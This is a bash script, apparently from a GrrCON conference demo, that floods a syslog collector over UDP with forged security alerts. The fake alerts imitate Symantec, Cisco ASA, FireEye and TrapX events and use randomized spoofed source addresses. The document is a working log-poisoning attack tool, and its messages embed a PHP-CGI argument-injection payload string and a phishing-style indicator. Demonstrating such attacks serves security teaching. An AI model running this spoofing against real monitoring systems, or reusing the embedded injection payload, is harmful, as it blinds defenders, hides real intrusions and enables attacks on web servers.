Syslog Spoof - GrrCON Demo - Charles Herring

1. #!/bin/bash
2. timestamp_short=$(date -d '8 hours ago' +"%b %d %T")
3. timestamp_medium=$(date -d '8 hours ago' +"%b %d %Y %T")
4. timestamp_long=$(date -d '8 hours ago' +"%B %d %Y %T")
5. streamerip=172.31.4.37
6. printf "Spoofing messages as fast as possible for 10 seconds .\n"
7. COUNTER=0
8. end=$((SECONDS+10))
9. LIES=0
10. while [ $SECONDS -lt $end ]; do
11.     attacker="10.$(( ( RANDOM % 254 )  + 1 )).$(( ( RANDOM % 254 )  + 1 )).$(( ( RANDOM % 254 )  + 1 ))"
12.     echo -n "<50>${timestamp_short} acmesep SymantecServer: ACMELAPTOP143,[SID: 26825] Web Attack: Plesk Command Injection attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\SKYPE\PHONE\SKYPE.EXE,Local: ${attacker},Local: 000000000000,Remote: ,Remote: 192.168.1.5,Remote: 000000000000,Inbound,TCP,Intrusion ID: 0,Begin: 2018-01-09 11:31:27,End: 2018-01-09 11:31:27,Occurrences: 1,Application: C:/PROGRAM FILES (X86)/SKYPE/PHONE/SKYPE.EXE,Location: Default,User: jdoe,Domain: ADLOCAL,Local Port 80,Remote Port 53590,CIDS Signature ID: 26825,CIDS Signature string: Web Attack: Plesk Command Injection,CIDS Signature SubID: 72137,Intrusion URL: localhost/phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=%22%22+-d+max_execution_time=0+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n,Intrusion Payload URL:" | nc -u -w 0 "${streamerip}" 514
13.     echo -n "<162>${timestamp_medium}: %ASA-2-106006: Deny inbound UDP from ${attacker}/15407 to 192.168.1.5/5060 on interface outside" | nc -u -w 0 "${streamerip}" 514
14.     echo -n "<161>fenotify-2587809.alert: CEF:0|FireEye|eMPS|8.0.2.682549|MO|malware-object|4|rt=${timestamp_short} UTC cn2Label=sid cn2=88970333 request=hxxps://capitanes.org.ar/document.htm act=notified dvchost=COSFireEyeEX.acme.com cs4Label=link cs4=https://192.168.1.5/emps/eanalysis?e_id\=5412033&type\=url&lms_iden\=0C:C4:7A:DA:FB:D6 duser=jdoe@acme.com cn1Label=vlan cn1=0 externalId=2587809 dvc=${attacker} suser=badguy@evil.com msg=DM2PR11MB0335C8A2D6B4EDF150793468D9100@evil.prod.outlook.com cs1Label=sname cs1=Phish.LIVE.DTI.URL start=Jan 09 2018 15:59:22 UTC cat=retro-detection devicePayloadId=2e8dd72f-97a8-4863-baab-805ead82feee fileType=exe flexString2Label=subject flexString2=[EXTERNAL] Invoices for approval" | nc -u -w 0 "${streamerip}" 514
15.     echo -n "<81>${timestamp_long} 127.0.1.1 CEF:0|TrapX|TSOC|6.0|ID:3|Intelligence Event - Network Scan Detected|4|rt=${timestamp_short} src=${attacker} deviceNtDomain=AcmedTrapxApp001_NIS dpt=256 cs5Label=company cs5=N.America proto=TCP deviceExternalId=279 dst=192.168.1.5 spt=45774 cat=Network Scan Detected devicePayloadId=NO externalId=11671827" | nc -u -w 0 "${streamerip}" 514
16.     COUNTER=$((COUNTER + 4))
17.     LIES=$((LIES + 1))
18. done
19. printf "$COUNTER spoofed messages sent concerning $LIES spoofed IP \n"